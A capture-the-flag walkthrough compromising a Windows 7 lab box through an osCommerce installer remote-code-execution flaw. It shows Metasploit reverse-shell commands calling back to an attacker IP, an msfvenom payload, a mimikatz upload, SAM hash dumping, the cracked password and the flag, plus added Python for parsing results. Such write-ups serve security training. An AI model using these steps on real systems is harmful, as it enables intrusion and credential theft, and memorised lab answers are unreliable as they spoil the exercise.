Blueprint
Hack into this Windows machine and escalate your privileges to Administrator.
Initial Reconnaissance
Service Scanning
┌──(kali㉿kali)-[~]
└─$ rustscan -a blueprint.thm -- -sV -sC
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 124 Microsoft IIS httpd 7.5
|_http-title: 404 - File or directory not found.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 124 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 124 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Supported Methods: GET HEAD POST
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Bad request!
445/tcp open microsoft-ds syn-ack ttl 124 Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql syn-ack ttl 124 MariaDB 10.3.23 or earlier (unauthorized)
8080/tcp open http syn-ack ttl 124 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-04-11 22:52 oscommerce-2.3.4/
| - 2019-04-11 22:52 oscommerce-2.3.4/catalog/
| - 2019-04-11 22:52 oscommerce-2.3.4/docs/
|_
| http-methods:
| Supported Methods: OPTIONS GET HEAD POST TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
49152/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49160/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

From the scan results, port 80 is Microsoft IIS 7.5 but only returns a 404. Ports 443 and 8080 run Apache 2.4.23 with PHP 5.6.28 and OpenSSL 1.0.2h, all long out of date, and port 8080 exposes a directory listing containing oscommerce-2.3.4/. The certificate on 443 is a self-signed "localhost" certificate with a 1024-bit RSA key and SHA-1 signature that expired in 2019, typical of a bundled Apache/PHP stack that was never configured. Port 3306 runs MariaDB, which rejects our probe as unauthorized, so it is of no use without credentials. The host is Windows 7 Home Basic SP1 with the usual Windows RPC and SMB services (ports 135, 139, 445, 49152 and up).
HTTP 80
Directory Enumeration
First, we run a content scan against the HTTP site with ffuf using a small directory wordlist.

Since the server runs Microsoft IIS, we also scan with the iis.txt wordlist.

Neither run produced anything useful.
SMB 139, 445
Next, we enumerate SMB with nmap's smb-enum* scripts.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p139,445 -sV --script=smb-enum* -v blueprint.thm
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Service Info: Host: BLUEPRINT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-enum-groups:
| BLUEPRINT\TelnetClients (RID: 1001): <empty>
| Builtin\Administrators (RID: 544): Administrator
| Builtin\Users (RID: 545): Lab
| Builtin\Guests (RID: 546): Guest
| Builtin\Performance Monitor Users (RID: 558): <empty>
| Builtin\Performance Log Users (RID: 559): <empty>
| Builtin\Distributed COM Users (RID: 562): <empty>
| Builtin\IIS_IUSRS (RID: 568): <empty>
|_ Builtin\Event Log Readers (RID: 573): <empty>
| smb-enum-shares:
| account_used: guest
| \\10.201.73.128\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.201.73.128\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.201.73.128\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ
| Current user access: READ/WRITE
| \\10.201.73.128\Users:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
| Current user access: READ
| \\10.201.73.128\Windows:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ
| smb-enum-domains:
| BLUEPRINT
| Groups: TelnetClients
| Users: Administrator, Guest, Lab
| Creation time: 2009-07-14T04:34:12
| Passwords: min length: n/a; min age: n/a days; max age: n/a days; history: n/a passwords
| Account lockout disabled
| Builtin
| Groups: Administrators, Distributed COM Users, Event Log Readers, Guests, IIS_IUSRS, Performance Log Users, Performance Monitor Users, Users
| Users: n/a
| Creation time: 2009-07-14T04:34:12
| Passwords: min length: n/a; min age: n/a days; max age: 42 days; history: n/a passwords
|_ Account lockout disabled
| smb-enum-users:
| BLUEPRINT\Administrator (RID: 500)
| Description: Built-in account for administering the computer/domain
| Flags: Normal user account, Password does not expire
| BLUEPRINT\Guest (RID: 501)
| Description: Built-in account for guest access to the computer/domain
| Flags: Normal user account, Password not required, Password does not expire
| BLUEPRINT\Lab (RID: 1000)
| Full name: Steve
|_ Flags: Normal user account

The results show two interesting disk shares, Users and Windows, that the guest account can read; IPC$ is also writable, which is normal for the named-pipe share. Anonymous (null-session) access is denied everywhere except IPC$, so the read access comes from the Guest account, which has no password set ("Password not required"). Account lockout is disabled, so password guessing against Lab would not lock the account.
/Users
After listing the whole share recursively, nothing in Users stands out: only the Default profile template and the Public folder are visible.
┌──(kali㉿kali)-[~]
└─$ smbclient -U 'guest' -c 'recurse;ls' //blueprint.thm/Users
Password for [WORKGROUP\guest]:
. DR 0 Fri Apr 12 05:36:40 2019
.. DR 0 Fri Apr 12 05:36:40 2019
Default DHR 0 Tue Jul 14 14:17:20 2009
desktop.ini AHS 174 Tue Jul 14 11:41:57 2009
Public DR 0 Tue Jul 14 11:41:57 2009
\Default
. DHR 0 Tue Jul 14 14:17:20 2009
.. DHR 0 Tue Jul 14 14:17:20 2009
AppData DHn 0 Tue Jul 14 09:37:05 2009
Desktop DR 0 Tue Jul 14 09:04:25 2009
Documents DR 0 Tue Jul 14 11:53:55 2009
Downloads DR 0 Tue Jul 14 09:04:25 2009
Favorites DR 0 Tue Jul 14 09:04:25 2009
Links DR 0 Tue Jul 14 09:04:25 2009
Music DR 0 Tue Jul 14 09:04:25 2009
NTUSER.DAT AHSn 262144 Mon Jan 16 05:39:21 2017
NTUSER.DAT.LOG AH 1024 Tue Apr 12 09:28:04 2011
NTUSER.DAT.LOG1 AH 197632 Fri Apr 12 05:49:06 2019
NTUSER.DAT.LOG2 AH 0 Tue Jul 14 09:03:40 2009
NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf AHS 65536 Tue Jul 14 11:34:22 2009
NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Tue Jul 14 11:34:22 2009
NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Tue Jul 14 11:34:22 2009
Pictures DR 0 Tue Jul 14 09:04:25 2009
Saved Games Dn 0 Tue Jul 14 09:04:25 2009
Videos DR 0 Tue Jul 14 09:04:25 2009
...
7863807 blocks of size 4096. 4762515 blocks available
/Windows
┌──(kali㉿kali)-[~]
└─$ smbclient -U 'guest' -c 'recurse;ls' //blueprint.thm/Windows
Password for [WORKGROUP\guest]:
NT_STATUS_ACCESS_DENIED listing \*

On the Windows share we are not permitted to list anything, even though the share itself reports READ for our account. Most likely the share-level permission grants read but the NTFS ACL on C:\Windows does not allow Guest to enumerate it.
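When triaging several hosts it is worth turning the smb-enum-shares block into structured data instead of eyeballing it, because "Anonymous access" and "Current user access" are different vantage points (the latter is whatever account nmap managed to use, here guest). The following is an added example, not code from the original writeup: it parses the nmap block printed above (re-indented the way nmap emits it) into share records and reports which shares are reachable anonymously versus with the authenticated account.

```python
import re
from typing import Dict, NamedTuple, Tuple


class Share(NamedTuple):
    name: str
    hidden: bool          # STYPE_*_HIDDEN: administrative shares ending in '$'
    anonymous: str        # access with a null session: <none>, READ, READ/WRITE
    current_user: str     # access with the account nmap authenticated as


# Constructed sample: the smb-enum-shares block from the scan above, with nmap's own indentation.
SAMPLE = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.201.73.128\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.201.73.128\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.201.73.128\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.201.73.128\Users:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|     Current user access: READ
|   \\10.201.73.128\Windows:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ
"""

SHARE_RE = re.compile(r"^\|\s+\\\\[^\\]+\\([^:]+):\s*$")      # |   \\host\NAME:
FIELD_RE = re.compile(r"^\|_?\s+([A-Za-z ]+):\s*(.*)$")         # |     Key: value
ACCOUNT_RE = re.compile(r"^\|\s+account_used:\s*(\S+)")


def parse_smb_enum_shares(text: str) -> Tuple[str, Dict[str, Share]]:
    """Return (account nmap used, {share name: Share}) from an smb-enum-shares block."""
    account = "anonymous"
    shares: Dict[str, Share] = {}
    current = None
    fields: Dict[str, str] = {}

    def flush() -> None:
        if current is not None:
            shares[current] = Share(
                name=current,
                hidden="HIDDEN" in fields.get("Type", ""),
                anonymous=fields.get("Anonymous access", "<none>"),
                current_user=fields.get("Current user access", "<none>"),
            )

    for line in text.splitlines():
        m = ACCOUNT_RE.match(line)
        if m:
            account = m.group(1)
            continue
        m = SHARE_RE.match(line)
        if m:
            flush()                       # close the previous share record
            current, fields = m.group(1), {}
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            fields[m.group(1)] = m.group(2).strip()
    flush()
    return account, shares


def accessible(shares: Dict[str, Share], via: str = "current_user") -> Dict[str, str]:
    """Shares whose access level is anything other than <none> from the given vantage point."""
    return {s.name: getattr(s, via) for s in shares.values() if getattr(s, via) != "<none>"}


if __name__ == "__main__":
    who, found = parse_smb_enum_shares(SAMPLE)
    print(f"authenticated as: {who}")
    print("anonymous:", accessible(found, "anonymous"))
    print(f"as {who}:", accessible(found))
```

Against this host the parser reports only IPC$ as reachable anonymously, while guest gets Users and Windows read-only plus read/write on IPC$; disk shares in the second set but not the first are the ones worth pulling with smbclient.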
HTTPS 443
On the HTTPS service on port 443 we find osCommerce, the same installation exposed by the directory listing on port 8080. osCommerce is a free, open-source e-commerce platform for building and running an online store, written in PHP on top of MySQL.

/oscommerce-2.3.4/
Browsing to /oscommerce-2.3.4/ shows the install's basic front page.

/oscommerce-2.3.4/catalog/
The /oscommerce-2.3.4/catalog/ directory holds the main storefront.

Next we search for known vulnerabilities and public exploits with searchsploit:

This osCommerce version has an unauthenticated Remote Code Execution (RCE) flaw, and conveniently a Metasploit module already exists for it. The module abuses the osCommerce web installer: catalog/install/ was never removed after setup, so the installer can be re-run and attacker-controlled PHP ends up in the configuration file it writes. Before firing the module, confirm that install/install.php is still reachable under catalog/; if the directory has been deleted, the module cannot work.

Shell as SYSTEM
msf > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set rhosts blueprint.thm
rhosts => blueprint.thm
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set rport 443
rport => 443
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set uri /oscommerce-2.3.4/catalog/install/
uri => /oscommerce-2.3.4/catalog/install/
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set lhost 10.17.21.52
lhost => 10.17.21.52
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set lport 4242
lport => 4242
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.17.21.52:4242
[*] Sending stage (40004 bytes) to 10.201.73.128
[*] Meterpreter session 1 opened (10.17.21.52:4242 -> 10.201.73.128:49355) at 2025-08-30 15:24:41 +0700
meterpreter > getuid
Server username: SYSTEM

With the reverse shell established we already run as SYSTEM (Apache evidently runs as a service under the LocalSystem account), so no privilege escalation is needed. However, because this is a PHP Meterpreter, what we can do on the target is quite limited.
meterpreter > load priv
Loading extension priv...
[-] Failed to load extension: The "priv" extension is not supported by this Meterpreter type (php/windows)
[-] The "priv" extension is supported by the following Meterpreter payloads:
[-] - windows/x64/meterpreter*
[-] - windows/meterpreter*
meterpreter >
Background session 1? [y/N]
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > search post windows hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/credentials/mcafee_vse_hashdump . normal No McAfee Virus Scan Enterprise Password Hashes Dump
1 post/windows/gather/credentials/domain_hashdump . normal No Windows Domain Controller Hashdump
2 post/windows/gather/credentials/mssql_local_hashdump . normal No Windows Gather Local SQL Server Hash Dump
3 post/windows/gather/hashdump . normal No Windows Gather Local User Account Password Hashes (Registry)
4 post/windows/gather/smart_hashdump . normal No Windows Gather Local and Domain Controller Account Password Hashes
Interact with a module by name or index. For example info 4, use 4 or use post/windows/gather/smart_hashdump
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > use 3
msf post(windows/gather/hashdump) > set session 1
session => 1
msf post(windows/gather/hashdump) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_unload_key, stdapi_sys_config_getprivs, stdapi_sys_config_getsid, stdapi_sys_config_steal_token, stdapi_sys_process_attach, stdapi_registry_create_key, stdapi_registry_enum_key_direct, stdapi_railgun_api, stdapi_railgun_api_multi, stdapi_railgun_memread, stdapi_railgun_memwrite, stdapi_registry_check_key_exists, stdapi_registry_set_value_direct, stdapi_registry_delete_key, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct
[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method `unpack' for nil
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:53:in `run'
[*] Post module execution completed
root.txt.txt
At this point we can locate root.txt.txt on the Administrator's Desktop and read it.
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 35184372097024 dir 211641814984-06-26 08:07:54 +0700 Administrator
All Users
040555/r-xr-xr-x 35184372097024 dir 169794966134-07-08 16:14:40 +0700 Default
Default User
040777/rwxrwxrwx 35184372097024 dir 202807130441-11-10 08:53:52 +0700 DefaultAppPool
040777/rwxrwxrwx 35184372097024 dir 202806952692-07-10 05:15:50 +0700 Lab
040555/r-xr-xr-x 17592186048512 dir 169793697254-09-05 19:29:09 +0700 Public
100666/rw-rw-rw- 747324309678 fil 169793697254-09-05 19:29:09 +0700 desktop.ini
meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Users\Administrator
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 211641782047-10-12 02:03:20 +0700 AppData
Application Data
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Contacts
Cookies
040555/r-xr-xr-x 0 dir 214344273165-05-09 17:45:44 +0700 Desktop
040555/r-xr-xr-x 17592186048512 dir 211641783000-06-29 23:21:19 +0700 Documents
040555/r-xr-xr-x 0 dir 211641857720-07-18 00:08:52 +0700 Downloads
040555/r-xr-xr-x 0 dir 211641783136-08-06 05:49:36 +0700 Favorites
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Links
Local Settings
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Music
My Documents
100666/rw-rw-rw- 3377699721314304 fil 211641781503-05-17 00:10:12 +0700 NTUSER.DAT
100666/rw-rw-rw- 281474976776192 fil 211641797971-09-22 15:12:29 +0700 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
100666/rw-rw-rw- 2251799814209536 fil 211641797971-09-22 15:12:29 +0700 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 2251799814209536 fil 211641797971-09-22 15:12:29 +0700 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
NetHood
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Pictures
PrintHood
Recent
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Saved Games
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Searches
SendTo
Start Menu
Templates
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Videos
100666/rw-rw-rw- 1125899907104768 fil 211641781503-05-17 00:10:12 +0700 ntuser.dat.LOG1
100666/rw-rw-rw- 0 fil 211641782047-10-12 02:03:20 +0700 ntuser.dat.LOG2
100666/rw-rw-rw- 85899345940 fil 211641782047-10-12 02:03:20 +0700 ntuser.ini
meterpreter > ls Desktop
Listing: Desktop
================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1211180777754 fil 211641783000-06-29 23:21:19 +0700 desktop.ini
100666/rw-rw-rw- 158913789989 fil 214344271123-10-28 16:41:29 +0700 root.txt.txt
meterpreter > cd Desktop
meterpreter > cat root.txt.txt
THM{aea1e3ce6fe7f89e10cea833ae009bee}
Dumping Lab's NTLM Hash
Next, we try uploading mimikatz to the target to dump the hashes.
meterpreter > cd "C:\Windows\Temp"
meterpreter > upload /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe
[*] Uploading : /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe -> mimikatz.exe
[*] Uploaded -1.00 B of 1.03 MiB (0.0%): /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe -> mimikatz.exe
[*] Completed : /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe -> mimikatz.exe
meterpreter > shell
Process 7300 created.
Channel 0 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\Temp>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Terminate channel 0? [y/N] y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>

The command times out and never returns output. The likely cause is the PHP payload: its shell channel runs commands from inside the web server's PHP process, a poor fit for long-running or interactive binaries. We should therefore upgrade to a native windows/meterpreter payload to get past these limitations.
First we generate the payload with msfvenom, then upload it through the existing Meterpreter session.
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.21.52 LPORT=4444 --platform windows -a x86 -f exe -o rev.exe
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: rev.exe
meterpreter > cd "C:\Windows\Temp"
meterpreter > upload ~/Desktop/rev.exe
[*] Uploading : /home/kali/Desktop/rev.exe -> rev.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /home/kali/Desktop/rev.exe -> rev.exe
[*] Completed : /home/kali/Desktop/rev.exe -> rev.exe
meterpreter > shell
Process 8188 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\Temp>.\rev.exe
Terminate channel 1? [y/N] y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>

Launching rev.exe from the shell channel hits the same timeout. Instead of running the payload through a cmd.exe child of the PHP process, we start the executable directly with Meterpreter's execute command. The multi/handler listener for port 4444 shown next must already be running when the binary is launched.
meterpreter > cd C:/Windows/Temp
meterpreter > execute -f rev.exe
Process 9680 created.

Once the native Meterpreter session arrives at the handler, we can load the kiwi extension and dump all the NTLM hashes from the SAM.
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.17.21.52
LHOST => 10.17.21.52
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.17.21.52:4444
[*] Sending stage (177734 bytes) to 10.201.73.128
[*] Meterpreter session 1 opened (10.17.21.52:4444 -> 10.201.73.128:49419) at 2025-08-30 16:06:27 +0700
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd lsadump::sam
Domain : BLUEPRINT
SysKey : 147a48de4a9815d2aa479598592b086f
Local SID : S-1-5-21-3130159037-241736515-3168549210
SAMKey : 3700ddba8f7165462130a4441ef47500
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 549a1bcb88e35dc18c7a0b0168631411
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : Lab
Hash NTLM: 30e87bf999828446a1c1209ddde4c450

Alternatively, Meterpreter's built-in hashdump command gives the same result without loading kiwi.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::

The output is in pwdump format: user:RID:LM hash:NT hash. The LM field aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string and simply means no LM hash is stored (the default since Windows Vista), and Guest's NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, which is why lsadump::sam printed no hash for that account. Finally, we look up the NT hashes on CrackStation to recover the plaintext.

The Lab user's password comes back as googleplus.
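An online lookup like CrackStation is a precomputed-table hit, so it pays to be able to confirm a candidate locally: an NT hash is just MD4 over the UTF-16LE encoding of the password, with no salt. The following is an added example, not code from the original writeup: it parses the hashdump lines above, flags the empty-LM and blank-password sentinels, and verifies a candidate password against a record. MD4 is implemented inline because hashlib's md4 is frequently missing on OpenSSL 3 builds without the legacy provider.

```python
import struct
from typing import Dict, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "", i.e. no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "", i.e. blank password

# Sample input: the hashdump output from the writeup above, in pwdump format.
HASHDUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
"""

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (pure Python; three rounds of 16 operations per 64-byte block)."""
    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):   # round 1: word order 0..15
            a, b, c, d = d, _rotl(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):   # round 2: words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl(a + G(b, c, d) + X[k] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):   # round 3: words 0,8,4,12,2,10,...
            a, b, c, d = d, _rotl(a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), unsalted."""
    return md4(password.encode("utf-16le")).hex()


class PwdumpRecord(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text: str) -> Dict[str, PwdumpRecord]:
    records: Dict[str, PwdumpRecord] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        records[user] = PwdumpRecord(user, int(rid), lm.lower(), nt.lower())
    return records


def describe(rec: PwdumpRecord) -> str:
    """Human-readable triage of the two well-known sentinel values."""
    notes = []
    if rec.lm == EMPTY_LM:
        notes.append("no LM hash stored")
    if rec.nt == EMPTY_NT:
        notes.append("blank password")
    return ", ".join(notes) or "NT hash present"


def check_candidate(rec: PwdumpRecord, candidate: str) -> bool:
    return nt_hash(candidate) == rec.nt


if __name__ == "__main__":
    for rec in parse_pwdump(HASHDUMP).values():
        print(f"{rec.user:14} RID {rec.rid:<5} {describe(rec)}")
    print("Lab == googleplus:", check_candidate(parse_pwdump(HASHDUMP)["Lab"], "googleplus"))
```

Because NT hashes are unsalted, the same plaintext always yields the same hash, which is exactly why a lookup table works at all; the same property means a single hash cracked once can be checked against every other dump you collect with nothing more than the function above.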